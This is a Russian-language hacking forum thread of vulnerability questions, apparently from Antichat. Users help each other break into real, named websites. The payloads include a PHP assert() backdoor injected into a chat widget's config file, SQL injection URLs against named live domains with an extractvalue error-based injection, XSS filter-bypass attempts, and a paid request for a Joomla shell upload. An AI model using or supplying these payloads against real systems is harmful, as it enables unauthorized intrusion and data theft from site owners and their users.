Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. L73898UNIT

    L73898UNIT New Member

    Joined:
    9 Dec 2018
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Привет, может кто подскажет.
    На один сайт недавно поставили какой-то телеграм-чат-хелпер. Но забыли закрыть чтение дериктории этого чата.
    Можно как-то воспользоваться этим, залить шелл и вытянуть всю инфу с сайта? Как?
    p.s. открывается только chat.html; ..install.php; ...css/db/js и две папки сверху (пустые).
    В инсталяторе чата не нашел какой-то возможности загрузить свой файл на сервер
    Сорри за нубские вопросы, спасибо
    Скрины ниже, буду благодарен любой помощи.
     

    Attached Files:

  2. L73898UNIT

    L73898UNIT New Member

    Joined:
    9 Dec 2018
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    UPD: Пробовал внести вредоносный скрипт через пароль менеджера (перезаписывает config). Вышло только с phpinfo(), а другие функции "show_source, system, shell_exec, passthru, exec, popen, proc_open" - отключены в disable_functions. Подскажите, как еще можно реализовать атаку?
     
  3. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Попробуй eval, assert.
     
    L73898UNIT and panic.ker like this.
  4. L73898UNIT

    L73898UNIT New Member

    Joined:
    9 Dec 2018
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Успешно внедрил в ..config.php 1"); assert(stripslashes($_REQUEST[cmd])); /*

    И теперь можно делать так: https://site.com/chat/..config.php?cmd=phpinfo()

    Круто, но более интересные функции не работают, даже phpversion()... если я конечно правильно использую эти функции:) Может проблема в том, что перезаписью ..config.php ничего не добиться?

    Также в phpinfo заметил:
    allow_url_fopen On

    allow_url_include On
     
  5. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    Так тебе же коллеги писали, пробуй system() passthru() copy(), но сначала найди врайтабельную папку предварительно, доступную из под веба. И не забывай, тебя дома ждет семья.
     
  6. L73898UNIT

    L73898UNIT New Member

    Joined:
    9 Dec 2018
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
  7. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Ну всё, суши сухари.
     
    cat1vo and Spinus like this.
  8. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Есть отраженый парамерт могу я как то указать сторонии адрес чтоб выполнить XSS ? фильтруется " ' <>
    Code:
    <script src="/static/bower_components/{тут}.js"></script>
    А также часто встречяется отраженые параметры в
    Code:
    action="vdv{тут}bfd"
    href="vdv{тут}bfd"
    собствено можно выполнить как то XSS когда до и после параметров какой то мусор ?
    Code:
    action="javascript:alert(1)"
    href="javascript:alert(1)"
     
    #2488 Octavian, 20 Dec 2018
    Last edited: 20 Dec 2018
  9. none222

    none222 Guest

    Reputations:
    0
    ^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^
    ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^
    ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^
    ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^
    ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^
    ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^
    ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^
    ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^
    ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^
    ^^^^^^^#####^^^############^^##^^^^
    ^^^^^^^^^^##^^^^##^^^^######^^^^^^^
    ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^
    ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^
    ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^
    ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^
    ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^
    ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^
    ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
     
    #2489 none222, 20 Dec 2018
    Last edited by a moderator: 6 Nov 2020
  10. none222

    none222 Guest

    Reputations:
    0
    ^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^
    ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^
    ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^
    ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^
    ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^
    ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^
    ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^
    ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^
    ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^
    ^^^^^^^#####^^^############^^##^^^^
    ^^^^^^^^^^##^^^^##^^^^######^^^^^^^
    ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^
    ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^
    ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^
    ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^
    ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^
    ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^
    ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
     
    #2490 none222, 20 Dec 2018
    Last edited by a moderator: 6 Nov 2020
  11. holdik

    holdik New Member

    Joined:
    4 Nov 2017
    Messages:
    13
    Likes Received:
    4
    Reputations:
    2
    Подскажите, как залить шелл Joomla 3, с правами администратора(не суперадмин). Шаблоны править не даёт.
    за годный способ заплачу, спасибо
     
  12. 2dd

    2dd New Member

    Joined:
    9 Aug 2011
    Messages:
    30
    Likes Received:
    1
    Reputations:
    0
    Помогите раскрутить SQL с жесткой фильтрацией. На входе есть 3 параметра которые попадают в SQL запрос, но мешают фильтры, поэтому у векторов с выводом в ошибку шансов совсем мало.
    Решил попробовать вектор union select, через order+by подобрал колонки, их 45 штук, фильтр на слово select обходится так: union(select)
    пробую запрос:
    Code:
    http://androfly.ir/wp-content/themes/marketica-wp/sql.php?id1=gfddg11'&id2=gfddg22'&id3=1)union(select(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45))#
    и тут засада, такой запрос блокируется... если на одну колонку больше или меньше, то всё проходит.
    буду благодарен!
     
  13. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Помогите раскрутить, странная скуля
    Code:
    https://www.hellinger.com/index.php?eID=tx_positioner_eID&data=%257B%2522userFunc%2522%253A%2522tx_positioner_pi1-%253Emain%2522%252C%2522ajaxResultLimit%2522%253A%252250%2522%252C%2522listViewImageHeight%2522%253A%2522100%2522%252C%2522ajaxSearchOrderBy%2522%253A%2522substring_index%2528storename%252C%2B%2527%2B%2527%252C%2B-1%2529%2522%252C%2522_LOCAL_LANG.%2522%253A%257B%2522de.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Aufstellername%2522%257D%252C%2522en.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Name%2Bof%2Bconstellator%2522%257D%252C%2522fr.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Name%2Bof%2Bconstellator%2522%257D%252C%2522it.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Nome%2Bdel%2Bcostellatore%2522%257D%252C%2522es.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Nombre%2Bdel%2Bconstelador%2522%257D%252C%2522br.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Nome%2Bdo%2Bconstelador%2522%257D%252C%2522ru.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522%255Cu0418%255Cu043c%255Cu044f%2B%255Cu0440%255Cu0430%255Cu0441%255Cu0441%255Cu0442%255Cu0430%255Cu043d%255Cu043e%255Cu0432%255Cu0449%255Cu0438%255Cu043a%255Cu0430%2522%257D%257D%252C%2522cosmicPowerEnabled%2522%253Anull%252C%2522templateFile%2522%253A%2522fileadmin%255C%252Fweb%255C%252Ftemplates%255C%252Fviews%255C%252Fpositioner%255C%252Ftemplate.html%2522%252C%2522cssFile%2522%253A%2522fileadmin%255C%252Fweb%255C%252Ftemplates%255C%252Fviews%255C%252Fpositioner%255C%252Flayout.css%2522%252C%2522detailsPageId%2522%253A%25221205%2522%252C%2522seminarDetailsPageId%2522%253A%2522%2522%252C%2522mailFormPageId%2522%253A%2522%2522%252C%2522externalSeminarRegisterPageId%2522%253A%2522%2522%252C%2522memberListItemsPerPage%2522%253A%2522%2522%252C%2522memberContactPageId%2522%253A%2522%2522%252C%2522shopPageId%2522%253A%2522%2522%252C%2522testSystem%2522%253A%25220%2522%252C%2522activityCategories%2522%253A%25221%252C2%252C3%252C4%252C5%252C6%252C50%252C51%252C52%252C53%2522%252C%2522displayMode%2522%253A%2522ajaxSearchForm%2522%252C%2522pid_list%2522%253A%2522447%2522%252C%2522_GP%2522%253A%257B%2522action%2522%253A%2522viewSearchForm%2522%257D%252C%2522lang%2522%253A%2522en%2522%252C%2522pageId%2522%253A%25221204%2522%257D&tx_positioner_pi1%5Baction%5D=search&tx_positioner_pi1%5Bsearch%5D=Germany&tx_positioner_pi1%5Blat%5D=&tx_positioner_pi1%5Blon%5D=&tx_positioner_pi1%5Bradius%5D=50&tx_positioner_pi1%5Bactivities%5D=1&tx_positioner_pi1%5Bqualification%5D=google_HD.png
     
  14. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    index.php?eID=tx_positioner_eID&data={"userFunc":"tx_positioner_pi1->main","ajaxResultLimit":"50","listViewImageHeight":"100","ajaxSearchOrderBy":"substring_index(storename,+'+',+-1)","_LOCAL_LANG.":{"de.":{"placeholderPositionerName":"Aufstellername"},"en.":{"placeholderPositionerName":"Name+of+constellator"},"fr.":{"placeholderPositionerName":"Name+of+constellator"},"it.":{"placeholderPositionerName":"Nome+del+costellatore"},"es.":{"placeholderPositionerName":"Nombre+del+constelador"},"br.":{"placeholderPositionerName":"Nome+do+constelador"},"ru.":{"placeholderPositionerName":"\u0418\u043c\u044f+\u0440\u0430\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0430"}},"cosmicPowerEnabled":null,"templateFile":"fileadmin\/web\/templates\/views\/positioner\/template.html","cssFile":"fileadmin\/web\/templates\/views\/positioner\/layout.css","detailsPageId":"1205","seminarDetailsPageId":"","mailFormPageId":"","externalSeminarRegisterPageId":"","memberListItemsPerPage":"","memberContactPageId":"","shopPageId":"","testSystem":"0","activityCategories":"1,2,3,4,5,6,50,51,52,53","displayMode":"ajaxSearchForm","pid_list":"447-extractvalue(1,concat(0x0a,(select+version()+from+tx_locator_locations+limit+1)))","_GP":{"action":"viewSearchForm"},"lang":"en","pageId":"1204"}&tx_positioner_pi1[action]=search&tx_positioner_pi1[search]=Germany&tx_positioner_pi1[lat]=&tx_positioner_pi1[lon]=&tx_positioner_pi1[radius]=50&tx_positioner_pi1[activities]=1&tx_positioner_pi1[qualification]=google_HD.png
     
    DezMond™ likes this.
  15. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Есть активная xss, alert работает, но вот document.cookie никак не хочет показывать, в чем может быть проблема?
     
  16. st55

    st55 Level 8

    Joined:
    20 Apr 2016
    Messages:
    196
    Likes Received:
    342
    Reputations:
    47
    Куки с флагом HttpOnly.
     
    dmax0fw likes this.
  17. izpodvbipodverta

    izpodvbipodverta New Member

    Joined:
    15 Nov 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
  18. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Запусти его и там вылезет описание, как правильно его запустить и что для этого нужно! Внизу даже есть скриншот "подсказка".
     
  19. izpodvbipodverta

    izpodvbipodverta New Member

    Joined:
    15 Nov 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Спасибо
     
  20. hibar1Xs

    hibar1Xs Member

    Joined:
    30 Jan 2019
    Messages:
    15
    Likes Received:
    8
    Reputations:
    3
    SQL.

    Как обойти ограничение введённого значения в 64 символа? Отсутствует вывод на страницу.
    Есть имя таблицы и столбца.
    Длина нужных столбцов: 13 и 10.
    Длина таблицы: 9.
    Code:
    'union select user_password from pref_user where user_id='1
    Union подходит, без вывода.
    Error-based не подходит под ограничение. Только вывод функций.
    Фильтр '<'.
    Провекрка введённых данных:
    PHP:
    $dataInput $_POST['email'];

    $email_check import_data($dataInput,'TEXT',64); // 64 длина символов.

    function import_data($dataInput$filter$maxlen=0){
      
    $v $dataInput;
      if (
    $maxlen 0)
           { 
    $v substr($v0$maxlen); }

           if(
    $filter === 'TEXT') {
                
    $v trim($v);
                if (
    strpos($v'<')===FALSE)
                        { 
    $pass TRUE; }
                else
                        { 
    $defret str_replace('<''&lt;'$v); } // Лог ошибки.
           
    }
           if(
    $pass) { return $v;}
    }

    Сам запрос в бд:
    PHP:

    $query 
    sql_func_query("SELECT COUNT(*) FROM $dbUsers WHERE email='".data_format($email_check)."'");
    $res sql_func_result($query,0,"COUNT(*)");
    // ...

    function sql_func_query($query){
       
    $result mysql_query($query);
       return 
    $result; }

    function 
    sql_func_result($res$row$col){
       return (
    mysql_result($res$row$col)); }